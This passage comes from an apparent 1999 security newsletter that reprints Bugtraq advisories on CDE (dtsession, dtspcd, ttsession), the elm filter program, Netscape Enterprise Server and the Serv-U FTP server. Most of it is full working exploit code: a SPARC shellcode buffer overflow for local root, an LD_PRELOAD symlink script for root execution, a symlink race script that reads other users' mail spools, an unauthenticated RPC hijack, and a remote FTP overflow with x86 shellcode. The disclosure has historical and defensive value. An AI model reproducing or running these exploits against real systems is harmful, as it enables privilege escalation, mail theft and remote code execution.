I discovered the following security problem in dtsession (actually in
libtt.so), part of CDE:
Description
-----------
The session manager dtsession contains an overflow vulnerability when parsing
the environment variable TT_SESSION.
Impact
------
Due to the fact that dtsession is running setuid root and does not remove the
root privilege (at least as tested on Solaris), the overflow can lead to
local root compromise.
Workaround
----------
I'm not quite sure what all the reasons are for dtsession having the setuid
bit turned on. Removing the setuid bit would at least lead to failure of the
password checking when unlocking a screen (due to the shadow file being only
readable by root). For personal workstation use this might be acceptable.
Affected systems
----------------
dtsession is part of CDE which is used by multiple UNIX vendors (among others:
Sun, HP, Compaq (Digital), IBM, Novell, SCO)
It looks like most systems running CDE are vulnerable, although the only
systems I have checked were:
Solaris 7, 2.6, 2.5.1
Background
----------
The dtsession program performs session management for CDE. It does this in
cooperation with ToolTalk. The ToolTalk library parses an environment string
that informs it of an already running ttsession daemon. When parsing this
environment variable it fails to check the size before calling sscanf().
The environment variable looks like thi
s:
TT_SESSION=01 18176 1289637086 1 0 1000 10.0.0.10 4
When a string larger than 280 bytes is used for the IP address (10.0.0.10), it
will overflow the stack.
Regards,
Job
---
Job de Haas job@itsx.com
ITSX bv http://www.itsx.com
-------8<-----------------------------------------------------------------
/*
* ovsession.c
* Job de Haas
* (C) ITSX BV 1999
*
* Some proof of concept code (== really ugly, barely working) at exploiting
* an overflow in libtt.so when parsing the TT_SESSION string.
* Only tested on a Solaris 2.6 sun4c sparc, with and without patch 105802-07
* based loosly on code by horizon <jmcdonal@unf.edu>
* Somehow the overflow is very sensitive to caching of the stack. To see that
* it really does work, run it in a debugger and set a break point in tt_open()
* when that is reached, set a breakpoint in sscanf and continue. When that is
* reached continue again and it will either crash or execute a shell.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/systeminfo.h>
#include <unistd.h>
#include <string.h>
#define BUF_LEN 280
char exploit[] =
"\220\33\100\15\202\20\40\27\221\323\100\15\220\33\100\17\
\220\2\40\10\320\43\277\370\224\2\40\11\332\52\277\377\
\332\43\277\374\220\33\140\1\202\20\40\6\221\323\100\15\
\220\33\100\15\202\20\40\51\221\323\100\15\320\3\277\370\
\222\43\240\10\224\43\240\4\202\20\40\73\221\323\100\15\
\232\33\100\15\232\33\100\15\232\33\100\15\232\33\100\15\
\232\33\100\15\232\33\100\15\232\33\100\15\232\33\100\15\
\177\377\377\344\232\33\100\15\57\142\151\156\57\153\163\150QQQ";
#if patched
#define got 0xef6d2be0
#else
#define got 0xef6d2f84
#endif
main()
{
char *argp[6], *envp[20];
char buf[3072];
char *ttsess;
char *display;
u_long *longp;
char data[512];
char padding[64];
char platform[256];
int pad=31;
int i;
memset(buf,0,3072);
memset(buf,'a',BUF_LEN);
longp = (unsigned long *)(buf+BUF_LEN);
/* %l0 - %l7 */
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
/* %i0 - %i7 */
*longp++ = 0xdeadcafe;
*longp++ = 0xefffff94; /* make sure %i1 can be used */
*longp++ = 0xdeadcafe;
*longp++ = got; /* also used before we get to the exploit */
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xefffffb0; /* frame with some necessary values */
*longp++ = 0xeffffdd0; /* return into the exploit code */
longp=(unsigned long *)data;
*longp++=0xdeadbeef;
*longp++=0xdeadbeef;
*longp++=0xdeadbeef;
*longp++=0xdeadbeef;
*longp++=0xdeadbeef;
*longp++=0xffffffff;
*longp++=0xdeadbeef;
*longp++=0;
*longp++=0xefffffb4;
*longp++=0x01;
*longp++=0xef6dc154;
*longp++=0xeffffd26;
*longp++=0x00;
argp[0] = strdup("/usr/dt/bin/dtsession");
argp[1] = NULL;
if (!getenv("DISPLAY")) {
printf("forgot to set DISPLAY\n");
exit(1);
}
sysinfo(SI_PLATFORM,platform,256);
pad+=20-strlen(platform)-strlen(argp[0]);
for (i=0;i<pad;padding[i++]='C')
padding[i]=0;
/* create an enviroment size independent of the size of $DISPLAY */
display = malloc( 8 + strlen(getenv("DISPLAY")) + 1);
strcpy(display,"DISPLAY=");
strcat(display+8,getenv("DISPLAY"));
envp[0] = display;
envp[1] = malloc(60);
memset(envp[1], 0, 60);
memset(envp[1], 'a', 60 - strlen(envp[0]));
strncpy(envp[1],"W=",2);
/* put the exploit code in the env space (easy to locate) */
envp[2] = strdup(exploit);
/* create the overflow string */
ttsess = strdup("TT_SESSION=01 18176 1289637086 1 0 1000 %s 4");
envp[3] = malloc( strlen(ttsess) + strlen(buf));
sprintf(envp[3],ttsess,buf);
/* make it easier to debug, probably smarter ways to do this */
envp[4] = strdup("LD_BIND_NOW=1 ");
/* put some data in the environment to keep the code running after the
overflow, but before the return pointer is used. includes NULL ptrs */
envp[5]=(data);
envp[6]="";
envp[7]="";
envp[8]="";
envp[9]=&(data[32]);
envp[10]="";
envp[11]="";
envp[12]=&(data[39]);
envp[13]="";
envp[14]="";
envp[15]="\010";
envp[16]=padding;
envp[17]=NULL;
execve("/usr/dt/bin/dtsession",argp,envp);
}
********************************************************************************
#3, DTspcd, geez they really need to fix CDE huh?... - Ed
Subject: Vulnerability in dtspcd
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
I discovered the following security problem in dtspcd, part of CDE:
Description
-----------
The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check
on client credentials.
Impact
------
The insufficient check can lead to a local root compromise.
Workaround
----------
Unknown.
Affected systems
----------------
The only systems I have checked were:
Solaris 7, 2.6, 2.5.1
However I strongly suspect most systems running CDE to be vulnerable.
Background
----------
The CDE subprocess daemon allows cross-platform invocation of applications. To
achieve this it is registered by inetd:
dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd
dtspc 6112/tcp # CDE subprocess
control
In order to authenticate the remote user, the daemon generates a filename
which is to be created by the client and then is verified by the daemon.
When verifying the created file, the daemon uses stat() instead of lstat()
and is subsequently vulnerable to a symlink attack. Further more the daemon
seems to allow empty usernames and then reverts to a publicly write-able
directory (/var/dt/tmp). I discovered this accidentally, but later read that
also unreadable home directories result in this behavior. The process can be
followed fairly well by setting the -log and -debug options on dtspcd (in
/etc/inetd.conf). It will create a log file in /var/dt/tmp/DTSPCD.log. This
will show information like:
--> REGISTER channel: 0, request: 4, length: 33, seq: 1 data: 4
Client protocol version is '1000'.: Mon Sep 13 10:32:33 1999
+++> Authentication file is '/var/dt/tmp/.SPC_AAA0RIUwK'.: Mon Sep 13 ..
Both these bugs can be combined to convince dtspcd it should execute an
action as root.
The script below performs all necessary actions on a Solaris host. It makes
use of the dtaction command of which the behavior is modified by pre-loading
a shared library with modified libc functions.
As a side note: Another thing I dislike is the way vendors sometimes
silently release patches (or didn't I watch closely enough?) In Solaris 2.6
a security problem in the linker was fixed which I never saw mentioned
anywhere. When specifying LD_PROFILE=libc.so.1 in the environment and
executing a setuid root program, a file /var/tmp/libc.so.1.profile is
created as root. This file is vulnerable to a symlink attack. To fix this
problem a recommended patch exists for Solaris 2.6.
Another feature of dtspcd, which was not obvious to me, is that it will
allow remote access to all systems that share NFS exported home directories
without requesting a password.
Regards,
Job
---
Job de Haas job@itsx.com
ITSX bv http://www.itsx.com
-------8<-----------------------------------------------------------------
#!/bin/sh
#
# dtspaced
# Demonstration of local root hole with dtspcd.
# Job de Haas
# (c) 1999 ITSX bv
#
# Mechanism is as follows:
# - dtaction requests the action 'Execute' through dtspcd.
# - dtscpd request a filename to be created which it will check for
# owner/suid bit.
# - BUG1: dtspcd allows creation in a public directory (with empty
# username).
# - BUG2: and forgets to check if the file is a symlink.
# - dtaction will create a symlink to a suid root binary and reply.
# - dtspcd considers dtaction authenticated and executes requested file
# as root.
#
# suggested fix: use lstat or refuse a symlink and why allow an empty
# username?
#
# exploit uses a shared lib to replace some functions to do what we want.
# Note that these are not used by dtspcd but by dtaction. The script executed
# by dtaction as root creates a file /tmp/root_was_here.
#
# tested on Solaris 2.5.1, 2.6 and 7
#
if [ -f /tmp/root_was_here -o -d /tmp/root_was_here ]; then
echo "/tmp/root_was_here already exists"
exit
fi
if [ "X$DISPLAY" = "X" ]; then
echo "need to set DISPLAY"
exit
fi
cat > /tmp/dtspaced.c << EOF
#include <pwd.h>
#define O_CREAT 0x100
#define O_RDONLY 0
#if __SunOS_5_5_1
#define open64 open
#define _open64 _open
#endif
open64(const char * filename, int flag, int mode)
{
if ((flag & O_CREAT) && ( strstr( filename, "SPC") )) {
symlink( "/usr/bin/passwd", filename);
filename = (char *)strdup("/tmp/shit");
unlink(filename);
}
return(_open64(filename, flag, mode));
}
chmod(const char * filename, int mode)
{
_chmod( filename, mode);
return(0);
}
struct passwd *getpwuid(uid_t uid)
{
struct passwd *pw;
pw = (struct passwd *)_getpwuid(uid);
pw->pw_name = (char *)strdup("");
return(pw);
}
EOF
cat > /tmp/doit << EOF
#!/bin/sh
unset LD_PRELOAD
/usr/bin/touch /tmp/root_was_here
EOF
chmod a+x /tmp/doit
mkdir /tmp/.dt
cat > /tmp/.dt/hack.dt << EOF
set DtDbVersion=1.0
ACTION Execute
{
LABEL Execute
TYPE COMMAND
WINDOW_TYPE NO_STDIO
EXEC_STRING \
"%(File)Arg_1"File To Execute:"%"
DESCRIPTION The Execute action runs a shell script or \
binary executable. It prompts for options and \
arguments, and then executes the script or \
executable in a terminal window.
}
EOF
DTDATABASESEARCHPATH=/tmp/.dt
export DTDATABASESEARCHPATH
# make a copy of dtaction so it is not suid root and will accept LD_PRELOAD
cp /usr/dt/bin/dtaction /tmp
echo "Compiling shared lib..."
cc -c /tmp/dtspaced.c -o /tmp/dtspaced.o
ld -G /tmp/dtspaced.o -o /tmp/dtspaced.so
LD_PRELOAD=/tmp/dtspaced.so
export LD_PRELOAD
echo "Executing dtaction..."
/tmp/dtaction -execHost 127.0.0.1 Execute /tmp/doit
unset LD_PRELOAD
/bin/rm -f /tmp/doit /tmp/dtaction /tmp/shit /tmp/dtspaced.*
/bin/rm -rf /tmp/.dt
if [ -f /tmp/root_was_here ]; then
echo "created file /tmp/root_was_here"
else
echo "exploit failed..."
fi
@HWA
51.0 elm filter program bug
~~~~~~~~~~~~~~~~~~~~~~
Subject: elm filter program
To: BUGTRAQ@SECURITYFOCUS.COM
Mark Ultor wrote:
> I've found a bug in filter on Elm 2.4 PL25. filter got SGID on mail group.
>
> sowatech:~$ filter -f `perl -e ' print "A" x 5000'`
> Segmentation fault
"filter" is inherently unsafe. A bug has been described in 1995 which
allows reading email of anybody on the system. The description can be
found in the BugTraq archives, I believe. I include the full message
below. While it was written in 1995, it still works with the filter
version of Elm 2.4ME+ PL35 (25) which is from 1997. (I don't know
whether there are any more recent elm versions.)
--Cornelius.
------cut here-------
filter (elm package) security hole
David J Meltzer (davem+@andrew.cmu.edu)
Tue, 26 Dec 1995 15:07:49 -0500
* Messages sorted by: [ date ][ thread ][ subject ][ author ]
* Previous message: Scott Chasin: "Happy Holidays"
The elm filter under linux runs sugrp mail, thus allowing it to freely
read and write from users mail spools. It is only through the integrity
of its code that the security of linux's mail system is protected; and in
this respect it falls short. The failure of the filter program to properly
handle temporary files allows a user to read or write to any user's mail
spool, a significant security hole.
The specific problem that is exploited in this hole is the way filter
uses a temporary file to store the input to it, and then subsequently send
it back out according to the filter. Because of the modularity of the
coding, in the main filter.c, the temporary file is opened, and then written
to; after which it is closed. The mailmessage function is then called, with
the purpose of forwarding that mail, written to the temporary file, to
whatever destination is specified in the filter. At the start of this
process, the temporary file is opened, and the contents of it are dumped
to the mail spool of the user the mail is being forwarded to.
At any point after the file has been initially opened by the main filter
function, since the user running filter has permissions on that temp file,
it can be rm'd. The temp file existing can then be replaced with a symbolic
link to any file that group mail has read permissions on. When it is opened
in the mailmessage function, the symbolic link is followed and whatever file
that was pointed to will be read in, and the contents forwarded to the user
specified in the mail spool.
The complete exploits are shown below:
Program: filter, an elm utility
Affected Operating Systems: linux - Slackware 3.0, others with sgid mail filter
Requirements: account on machine
Security Compromise: user can read any mail spool readable by grp mail.
(usually everything, sometimes not root)
Author: Dave M. (davem@cmu.edu)
Synopsis: filter writes out the mail to be forwarded to a
temporary file, which is then closed and reopened;
if when the temporary file is reopened it is a
symlink to a mail spool, filter will proceed
to forward the contents of that file as if it was
the original message.
------cut here-------
#!/bin/sh
# This shell script exploits a problem with filter(1L)
# it will follow symbolic links, on a read allowing
# us to steal a users mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#
# Dave M. (davem@cmu.edu)
#
cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp
cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit
_EOF_
echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp
/tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail
@HWA
52.0 Accept overflow on Netscape Enterprise Server 3.6 SP2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: Nobuo Miwa <n-miwa@LAC.CO.JP>
Subject: Accept overflow on Netscape Enterprise Server 3.6 SP2
Hi,
I found a vulnerability in "Enterprise 3.6 SP 2 SSL Handshake fix"..
I sent a malformed URL to the server and its service was dead.
Its URL is following...
GET / HTTP/1.0
Accept: aaaaaaaaaaaaaa...2000byte/gif
Ofcourse you must be able to execute small code you like with
"long Accept" command(just like htr problem on IIS).
I've reported this to Netscape on 31st Aug. They've just
finished making the patch(maybe SP3). It must be released soon.
I'm gonna post this to BUGTRAQ after they release the patch, but
someone posted it to some other mailing lists. So I decided
to post it to here today.
Thanks,
Nobuo Miwa(Moderator of BUGTRAQ-JP)
***********************************************************************************
Subject: Vulnerability in ttsession
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
I discovered the following security problem in ttsession, part of CDE:
Description
-----------
The ToolTalk session daemon ttsession does not properly check client
credentials.
Impact
------
The insufficient check can lead to compromise of a system from both local
and remote with the credentials of the user running ttsession. Note that
ttsession is not a system daemon and may not be running all the time. It is
normally started as part of an X-session. Also client programs of ttsession
may restart the daemon if it can not be found running.
Workaround
----------
This problem has only been detected when the ttsession daemon is running with
Unix RPC authentication flavor. This is the default. With options this can be
changed to, for example, secure-RPC (DES). With CDE it can be configured in
/usr/dt/bin/Xsession.
Affected systems
----------------
As far as I know, ttsession has been part of OpenWindows (SunOS 4.1.x and
Solaris), CDE (Solaris, AIX, HP, OSF/Digital, others?) and IRIX.
It looks like most systems running CDE are vulnerable, although the only
systems I have checked were:
Solaris 7, 2.6, 2.5.1
OSF v4.0
HP-UX B.10.20
AIX 2 4 000096754200
It is unknown what the status with respect to SunOS 4.1.x and SGI is.
Background
----------
The ttsession daemon is part of the ToolTalk toolkit and allows applications
to send messages to each other. This is achieved by RPC calls. The RPC calls
are not properly authenticated.
When sniffing a tt_open request to a remote host the following can be seen:
host1 -> host2 TCP D=33169 S=38194 Syn Seq=3510273898 Len=0
host2 -> host1 TCP D=38194 S=33169 Syn Ack=3510273899 Seq=914492820
host1 -> host2 TCP D=33169 S=38194 Ack=914492821 Seq=3510273899
host1 -> host2 RPC C XID=932526186 PROG=1289637086 VERS=4 PROC=0
host2 -> host1 TCP D=38194 S=33169 Ack=3510273971 Seq=914492821
host2 -> host1 RPC R (#4) XID=932526186 Success
host1 -> host2 RPC C XID=932526185 PROG=1289637086 VERS=4 PROC=400
host2 -> host1 TCP D=38194 S=33169 Ack=3510274043 Seq=914492849
host2 -> host1 RPC R (#7) XID=932526185 Success
host1 -> host2 RPC C XID=932526184 PROG=1289637086 VERS=4 PROC=18
host2 -> host1 RPC R (#10) XID=932526184 Success
host1 -> host2 RPC C XID=932526183 PROG=1289637086 VERS=4 PROC=11
host2 -> host1 RPC R (#12) XID=932526183 Success
host1 -> host2 TCP D=33169 S=38194 Ack=914493001 Seq=3510274267
host1 -> host2 TCP D=33169 S=38194 Fin Ack=914493001 Seq=3510274267
host2 -> host1 TCP D=38194 S=33169 Ack=3510274268 Seq=914493001
host2 -> host1 TCP D=38194 S=33169 Fin Ack=3510274268 Seq=914493001
host1 -> host2 TCP D=33169 S=38194 Ack=914493002 Seq=3510274268
This shows how first the NULL procedure of ttsession is called and next a
procedure with number 400. Then procedure 18 and 11 are called. The contents
of the reply to the PROC=400 call is something like:
host2 -> host1 RPC R (#7) XID=932526185 Success
0: 0800 0000 0000 0800 0000 0000 0800 4500 .. tUb.. .v...E.
16: 0078 b3ab 4000 ff06 a2bf 7f00 0001 7f00 .x..@...........
32: 0001 8191 9532 3682 0db1 d13a 87fb 5018 .....26....:..P.
48: 2238 427e 0000 8000 004c 3795 3869 0000 "8B~.....L7.8i..
64: 0001 0000 0000 0000 0000 0000 0000 0000 ................
80: 0000 0000 002d 5020 3031 2031 3831 3736 .....-P 01 18176
96: 2031 3238 3936 3337 3038 3620 3120 3020 1289637086 1 0
112: 3130 3030 2031 302e 302e 302e 3130 2034 1000 10.0.0.10 4
128: 0000 ..
This same string can be found in the environment of a shell started as part
of a CDE X-session (if it was started by ttsession):
TT_SESSION=01 18176 1289637086 1 0 1000 10.0.0.10 4
This is also described in the man page for ttession(1).
When this strings is looked at more closely, some aspects can be recognized.
The number 1289637086 for example is the RPC program number (Solaris 7). Also
the IP of the remote host can be seen (10.0.0.10). The number 18176 is the
PID of the ttsession process and 1000 is the uid of the user running
ttsession.
When playing around with the RPC call to retrieve this string from ttsession,
I discovered it doesn't need client credentials to match the user which is
running ttsession. Thus anyone can retrieve this string from a ttsession
daemon!
This combined with the discovery that the string is used by the tt_open call
to determine the remote ttsession to connect to leads to the exploit code
below. This code uses a message to invoke a dtpad on the host running
ttsession. By using some tricks, it makes sure the dtpad is displayed on
the requested DISPLAY.
Reason why the exploit may fail:
When a dtpad has been display on a X-server, it will keep a lock on that
server until the dtpad -server process on the remote host has been
terminated. Until that time no other dtpads from different hosts can be
displayed on that Xserver. Close the X session and log back in again and
try again.
Regards,
Job
---
Job de Haas job@itsx.com
ITSX bv http://www.itsx.com
-------8<-----------------------------------------------------------------
/*
* ttjamsession.c
* Job de Haas
* (c) ITSX bv 1999
*
* This is a simple ttsession exploit to show some problems with
* authentication of a remote user. The possibilities after authentication
* are not limited to starting dtpad, but rather any ptype as can be shown
* with tt_type_comp. On Solaris this includes dtterm.
*
* compile with:
* cc -L/usr/dt/lib -I/usr/dt/include -I/usr/openwin/include -ltt -lnsl
* ttjamsession.c -o ttjamsession
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <rpc/rpc.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <pwd.h>
#include <Tt/tt_c.h>
#include <Tt/tttk.h>
#define TTSESSION_PROG 1342177279
#define TTSESSION_PROG_SOL7 1289637086
#define TTSESSION_VERS 3
#define TTSESSION_GETSESSID 400
long rpcprog = TTSESSION_PROG;
int version = TTSESSION_VERS;
long uid = -1;
int use_env = 0;
int test = 0;
/*
* For some reason the string is not returned with xdr_wrapstring. After
* some fiddling this seems to work.
*
*/
xdr_mystring(xdrs, objp)
register XDR *xdrs;
char **objp;
{
int len;
if (!xdr_int(xdrs, &len)) {
return 0;
}
*objp = (char *)malloc(len + 1);
if (xdr_opaque(xdrs, (caddr_t)*objp, len)) {
(*objp)[len] = '\0';
} else { return 0; }
return(1);
}
/*
* This is some generated code by ttsnoop (nice program! at least on sol 2.6)
* It was modified a bit to get it to spawn the program on the correct display
*/
Tt_callback_action
process_Instantiate_reply( Tt_message msg, Tt_message pat );
Tt_message
create_Instantiate(
Tt_message context,
char *action
)
{
Tt_message msg;
msg = tttk_message_create( context, TT_REQUEST, TT_SESSION,
0, action,
(Tt_message_callback)process_Instantiate_reply );
tt_message_arg_add( msg, TT_IN, "data", "data");
tt_message_context_set( msg, "$DISPLAY", getenv("DISPLAY"));
tt_message_disposition_set( msg, TT_START);
tt_message_handler_ptype_set( msg, "DTPAD");
return msg;
}
static Tt_callback_action
process_Instantiate_reply(
Tt_message msg,
Tt_message pat
)
{
switch (tt_message_state(msg)) {
case TT_SENT: /* handler is in this process */
case TT_STARTED:/* intermediate state */
case TT_QUEUED: /* intermediate state */
default: /* unknown state */
return TT_CALLBACK_CONTINUE;
case TT_HANDLED:
/* ... */
break;
case TT_FAILED: {
int status;
char *string;
status = tt_message_status( msg );
string = tt_message_status_string( msg );
printf("message failed with: %s\n",string);
/* ... */
} break;
}
tt_message_destroy( msg );
return TT_CALLBACK_PROCESSED;
}
/*
* The routine to get the remote sessionid string.
*
*/
int
get_sessionid( remotehost, port)
char *remotehost;
ushort port;
{
struct sockaddr_in server_addr;
enum clnt_stat clnt_stat;
struct hostent *hp;
struct timeval timeout;
CLIENT *clnt;
int msock;
char *buf;
char *env;
char *hostname;
char localhost[MAXHOSTNAMELEN];
memset((char *)&server_addr, 0, sizeof (server_addr));
if (remotehost) {
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = inet_addr(remotehost);
if ( server_addr.sin_addr.s_addr == -1 ) {
if ((hp = gethostbyname(remotehost)) == NULL) {
printf("Can't resolve %s\n",remotehost);
exit(1);
}
memcpy((char *)&server_addr.sin_addr, hp->h_addr, hp->h_length);
hostname = strdup( remotehost );
}
}
else {
if (gethostname(localhost, MAXHOSTNAMELEN)<0) {
perror("gethostname");
exit(1);
}
if (hp = gethostbyname(localhost)) {
memcpy((char *)&server_addr.sin_addr, hp->h_addr, hp->h_length);
hostname = strdup( localhost );
} else {
server_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
hostname = strdup( "127.0.0.1" );
}
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port);
msock = RPC_ANYSOCK;
timeout.tv_sec = 15;
timeout.tv_usec = 0;
if ( (clnt = (CLIENT *)clnttcp_create(&server_addr, rpcprog,
TTSESSION_VERS, &msock, 10000, 10000)) == NULL) {
clnt_pcreateerror("clnttcp_create");
exit(1);
}
/*
* apparently credentials are not checked!
*/
clnt->cl_auth = authunix_create(hostname, 0, 0, 0, NULL);
if ((clnt_stat = clnt_call(clnt, TTSESSION_GETSESSID,
(xdrproc_t) xdr_void, (caddr_t) 0,
(xdrproc_t) xdr_mystring, (caddr_t) &buf,
timeout)) != RPC_SUCCESS) {
clnt_perror(clnt, "get session");
return(-1);
}
/*
* put TT_SESSION in the environment for tt_open to use.
*/
env = malloc( strlen("TT_SESSION=") + strlen( buf+2 ) +1);
strcpy(env,"TT_SESSION=");
strcat(env,buf+2);
putenv( env );
printf("Session ID: %s\n", buf);
return(0);
}
usage(progname)
char *progname;
{
fprintf(stderr,
"Usage: %s [-p port] [-r rpc prognumber] [-u uid]\n", progname);
fprintf(stderr," [-7] [-t] [-e] hostname\n");
fprintf(stderr,"[-7] use Solaris 7 default ttsession program number\n");
fprintf(stderr,"[-t] test the RPC call but not send messages\n");
fprintf(stderr,"[-e] get TT_SESSION from environment (no RPC call)\n");
exit(-1);
}
int main(argc, argv)
int argc;
char **argv;
{
char *hostname = NULL;
struct in_addr addr;
extern int optind;
extern char *optarg;
short port = 0;
char c, *cp;
Tt_message context, msg;
char *procid;
while ((c = getopt(argc, argv, "u:p:r:7et")) != EOF) {
switch (c) {
case 'r':
rpcprog = atoi(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 'u':
uid = atoi(optarg);
break;
case '7':
rpcprog = TTSESSION_PROG_SOL7;
break;
case 'e':
use_env = 1;
break;
case 't':
test = 1;
break;
default:
usage(argv[0]);
}
}
if (optind < argc) {
hostname = strdup(argv[optind++]);
}
if (optind < argc) {
port = atoi(argv[optind++]);
}
if (optind < argc) {
usage(argv[0]);
}
/* setup the socket and test correct service */
if ( !use_env && (get_sessionid( hostname, port ) < 0 )) {
printf("Failed to properly connect to ttsession\n");
exit(1);
}
if (test) exit(0);
/*
* Open up the channel to ttsession. The code uses the TT_SESSION
* environment var to figure out how.
*/
if (((procid = tt_open()) == NULL) || (*procid == '\0')) {
perror("tt_open");
exit(1);
}
/*
* Now we can send messages... like instantiate a dtpad!
* Two messages are sent to cause a new dtpad -server to be started
* so that the dtpad will be displayed on our server even if the local
* user is also using dtpad. I use sleep cause I can't seem to trigger
* the callback.
*
*/
msg = create_Instantiate(context, NULL);
tt_message_send(msg);
sleep(10);
msg = create_Instantiate(context, "Instantiate");
tt_message_send(msg);
sleep(10);
/* no idea if I got to wait for the callback */
exit(0);
}
@HWA
53.0 Serv-U Ver2.5 FTPd Win9x/NT Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Exploit: Serv-U Ver2.5 FTPd Win9x/NT
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
"Version 2.5a Released 5 May 1999
* Fixed bug introduced in v2.5 causing crashes with long paths in FTP
commands."
Upgrade is available at http://www.ftpserv-u.com/.
Original thread:
http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-04-28&thread=3.0.5.32.19980430122137.008199a0@mail.smartlink.net
Max Vision
/*
FTP Serv-U Version 2.5 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 9000
#define FTP_PORT 21
#define RETADR 164
#define CODEOFS 200
#define FSTACKOFS 174
#define JMPOFS 6
#define MAXUSER 100
#define MAXPASS 100
#define EIP 0xbff7a027
#define FAKESTACK 0x80050101
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe";
void sendcmd(int sockfd,char *packetbuf)
{
int i;
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
}
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
char user[MAXUSER],pass[MAXPASS];
int sockfd,i,fakestack,ip,ebp,ins;
if (argc<2){
printf("usage\n %s HostName {[username] [password]}\n",argv[0]);
exit(1);
}else if (argc==4){
strncpy(user,argv[2],MAXUSER-1);
strncpy(pass,argv[3],MAXPASS-1);
user[MAXUSER-1]=0; pass[MAXPASS-1]=0;
}else{
strcpy(user,"anonymous");
strcpy(pass,"hoge@hohoho.com");
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
memset(buf,NOP,BUFSIZE);
fakestack=FAKESTACK;
for (i=0;i<FSTACKOFS;i+=4){
buf[i ]=fakestack&0xff;
buf[i+1]=(fakestack>>8)&0xff;
buf[i+2]=(fakestack>>16)&0xff;
buf[i+3]=(fakestack>>24)&0xff;
}
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[RETADR+4]=JMPS;
buf[RETADR+5]=JMPOFS;
memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;
sprintf(packetbuf,"user %s\r\n",user);
sendcmd(sockfd,packetbuf);
sprintf(packetbuf,"pass %s\r\n",pass);
sendcmd(sockfd,packetbuf);
sprintf(packetbuf,"cwd %s\r\n",buf);
sendcmd(sockfd,packetbuf);
close(sockfd);
}
@HWA
